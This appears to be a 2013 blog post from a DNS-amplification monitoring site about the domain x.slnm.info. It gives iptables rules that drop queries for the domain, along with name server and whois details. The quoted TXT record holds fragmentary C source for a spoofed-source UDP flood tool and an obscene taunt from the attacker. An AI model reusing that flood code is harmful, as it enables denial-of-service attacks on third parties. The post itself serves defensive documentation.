Sunday, November 17, 2013

Domain: x.slnm.info

Domain: x.slnm.info

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

This rule should match any single char subdomain for slnm.info:

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x01000453 && 0x2c&0xDFDFDFFF=0x4c4e4d04 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.slnm.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|04736c6e6d04696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.slnm.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


Unknown

Name server:

;; ANSWER SECTION:
slnm.info. 21600 IN NS ns1.slnm.info.
slnm.info. 21600 IN NS ns2.slnm.info.

ns1.slnm.info. 86189 IN A 199.217.118.89
ns2.slnm.info. 86189 IN A 199.217.118.89


Response:


TXT 1
Rsize: 3950



TXT record:

x.slnm.info. 81241 IN TXT "void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;struct iphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id = htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = srcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =----" ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- HI ALL DNSssssss. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8===========================================================================================================================================================================>"


Whois


Domain ID:D51025000-LRMS
Domain Name:SLNM.INFO
Created On:16-Nov-2013 18:49:09 UTC
Last Updated On:16-Nov-2013 18:55:53 UTC
Expiration Date:16-Nov-2014 18:49:09 UTC
Sponsoring Registrar:Internet Invest, Ltd. dba Imena.ua (R503-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:DI_14171185
Registrant Name:Whois privacy protection service
Registrant Organization:Internet Invest, Ltd. dba Imena.ua
Registrant Street1:Gaidara, 50 st.
Registrant Street2:
Registrant Street3:
Registrant City:Kyiv
Registrant State/Province:
Registrant Postal Code:01033
Registrant Country:UA
Registrant Phone:+380.442010102
Registrant Phone Ext.:
Registrant FAX:+380.442010100
Registrant FAX Ext.:
Registrant Email:hostmaster@imena.ua
Admin ID:DI_14171185
Admin Name:Whois privacy protection service
Admin Organization:Internet Invest, Ltd. dba Imena.ua
Admin Street1:Gaidara, 50 st.
Admin Street2:
Admin Street3:
Admin City:Kyiv
Admin State/Province:
Admin Postal Code:01033
Admin Country:UA
Admin Phone:+380.442010102
Admin Phone Ext.:
Admin FAX:+380.442010100
Admin FAX Ext.:
Admin Email:hostmaster@imena.ua
Billing ID:DI_14171185
Billing Name:Whois privacy protection service
Billing Organization:Internet Invest, Ltd. dba Imena.ua
Billing Street1:Gaidara, 50 st.
Billing Street2:
Billing Street3:
Billing City:Kyiv
Billing State/Province:
Billing Postal Code:01033
Billing Country:UA
Billing Phone:+380.442010102
Billing Phone Ext.:
Billing FAX:+380.442010100
Billing FAX Ext.:
Billing Email:hostmaster@imena.ua
Tech ID:DI_14171185
Tech Name:Whois privacy protection service
Tech Organization:Internet Invest, Ltd. dba Imena.ua
Tech Street1:Gaidara, 50 st.
Tech Street2:
Tech Street3:
Tech City:Kyiv
Tech State/Province:
Tech Postal Code:01033
Tech Country:UA
Tech Phone:+380.442010102
Tech Phone Ext.:
Tech FAX:+380.442010100
Tech FAX Ext.:
Tech Email:hostmaster@imena.ua
Name Server:NS1.SLNM.INFO
Name Server:NS2.SLNM.INFO
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 
Name Server: 



No comments:

Post a Comment